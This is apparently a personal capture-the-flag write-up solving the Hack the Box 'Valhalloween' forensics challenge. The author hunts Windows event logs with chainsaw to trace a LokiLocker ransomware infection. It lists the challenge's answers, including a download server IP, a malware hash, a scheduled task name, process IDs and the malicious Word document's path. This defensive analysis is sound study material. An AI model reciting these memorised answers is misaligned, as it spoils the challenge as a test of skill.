HTB Writeups
  • HTB Writeups
  • Boxes: Very Easy
    • Academy
    • Archetype
    • Arctic
    • Base
    • Bike
    • Blue
    • Explosion
    • Included
    • Markup
    • Oopsie
    • Redeemer
    • Responder
    • Shield
    • Unified
    • Vaccine
  • Boxes: Easy
    • Analytics
    • Armageddon
    • Bashed
    • Beep
    • Blocky
    • Bounty Hunter
    • Buff
    • Cap
    • CozyHosting
    • Devel
    • Explore
    • Forest
    • Grandpa
    • Granny
    • Horizontall
    • Jerry
    • Keeper
    • Knife
    • Lame
    • Late
    • Legacy
    • Mirai
    • Netmon
    • Nibbles
    • Optimum
    • Paper
    • Photobomb
    • Precious
    • RedPanda
    • Return
    • Sau
    • ScriptKiddie
    • Sense
    • Servmon
    • Shocker
    • Shoppy
    • Squashed
    • Trick
  • Boxes: Medium
    • Poison
  • Challenges
    • Behind the Scenes
    • Canvas
    • Debugging Interface
    • Digital Cube
    • Easy Phish
    • Find the Easy Pass
    • Forest
    • Infiltration
    • misDIRection
    • Pusheen Loves Graphs
    • Retro
    • Signals
    • The Secret of a Queen
    • Wrong Spooky Season
  • Fortresses
  • Cyber Apocalypse 2023: The Cursed Mission
    • The Cursed Mission
    • Alien Cradle
    • Critical Flight
    • Debug
    • Extraterrestrial Persistence
    • Getting Started
    • Needle in the Haystack
    • Orbital
    • Packet Cyclone
    • Passman
    • Perfect Sync
    • Persistence
    • Plaintext Tleasure
    • Questionnaire
    • Reconfiguration
    • Relic Maps
    • Roten
    • Secret Code
    • Shattered Tablet
    • Small StEps
  • Hack the Boo 2023
    • Hauntmart
    • Spellbrewery
    • Trick or Treat
    • Valhalloween
  • Cyber Apocalypse 2024: Hacker Royale
    • Hacker Royale
    • An Unusual Sighting
    • BoxCutter
    • BunnyPass
    • Character
    • Data Siege
    • Delulu
    • Dynastic
    • Fake Boost
    • Flag Command
    • Game Invitation
    • It has begun
    • KORP Terminal
    • Labyrinth Linguist
    • LockTalk
    • Lucky Faucet
    • Makeshift
    • Maze
    • Packed Away
    • Phreaky
    • Primary Knowledge
    • Pursue the Tracks
    • Rids
    • Russian Roulette
    • Stop Drop and Roll
    • Testimonial
    • TimeKORP
    • Unbreakable
    • Urgent
  • CYBER APOCALYPSE 2025: Tales from Eldoria
    • Tales from Eldoria
    • A New Hire
    • Cave Expedition
    • Echoes in Stone
    • Eldorion
    • Embassy
    • EncryptedScroll
    • HeliosDEX
    • Quack Quack
    • Silent Trap
    • Stealth Invasion
    • Tales for the Brave
    • The Ancient Citadel
    • The Hillside Haven
    • The Stone That Whispers
    • Thorins Amulet
    • ToolPie
    • Traces
    • Trial by Fire
    • Whispers of the Moonbeam
Powered by GitBook
On this page
  1. Hack the Boo 2023

Valhalloween

Personal Rating: Easy

PreviousTrick or TreatNextHacker Royale

Last updated 1 year ago

We have a lot of Windows Event Log files in evtx format:

I ran chainsaw over it with this command, which is perfect for this job:

./chainsaw hunt /HTBfolder/HacktheBoo2023/forensics_valhalloween/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/

The challenge was in a question-answer style. Here are the results that I could deduce from the chainsaw output:

1)

  • The first challenge question is “What are the IP address and port of the server from which the malicious actors downloaded the ransomware?"

  • I searched for “Download” in the chainsaw log to find instances of software being downloaded to the PC. I quickly identified 103.162.14.116:8888 as source

2)

  • The second question is to find the md5 hash of the WannaCry malware that was executed. The timestamp where the malware was initially downloaded was 2023-09-20 03:03:22 Here I see that the program is called "mscalc.exe". Searching for that in the logs, I found the initial execution of the program at 2023-09-20 03:03:24 with the md5 hash B94F3FF666D9781CB69088658CD53772

3)

  • The third question is to find the family label of the ransomware online, based on the hash

  • Searching for the hash on VirusTotal, the family name seems to be “lokilocker”

4)

  • The fourth question is to find the name of the task scheduled by the ransomware

  • Searching for “Scheduled Task Creation” in the chainsaw output, I quickly found the name "Loki" for a task created by the malware

5)

  • The fifth question is to find the process name and ID of the ransomware process in the format svchost.exe_4953. To find it, I will go back to the timestamp of the initial execution, 2023-09-20 03:03:24

  • What they wanted here was the process and process ID of the parent process, which is Powershell. The solution was powershell.exe_3856

6)

  • In the sixth question we should follow the PPID we just found to provide that file path that initiates the infection chain, for example C:\malicious.pdf

  • C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe seems to be wrong. We might have to look earlier

  • I followed the execution flow from the process ID up, by searching for the ParentProcessID until I found the initial one, which is 7280. The ParentCommandline of that Process with the ID 7280 is the following which contains the initial malicious document:

C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n "C:\Users\HoaGay\Documents\Subjects\Unexpe.docx" /o

7)

  • The next question is to find the timestamp of when the first file in the execution chain was opened

  • I noticed that I should also create the same chainsaw output in json format to search for full strings. I did that with:

./chainsaw hunt /HTBfolder/HacktheBoo2023/forensics_valhalloween/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/ --json | jq > out.txt

  • I found the event in the chainsaw output, but it was two seconds off, so the result was not accepted. The correct time could be found by checking the Security event log in Windows Event Viewer and searching for event ID 4688, which is the file open event. Looking for the time when the docx file from before was opened, we found the event at 2023-09-20_03:03:20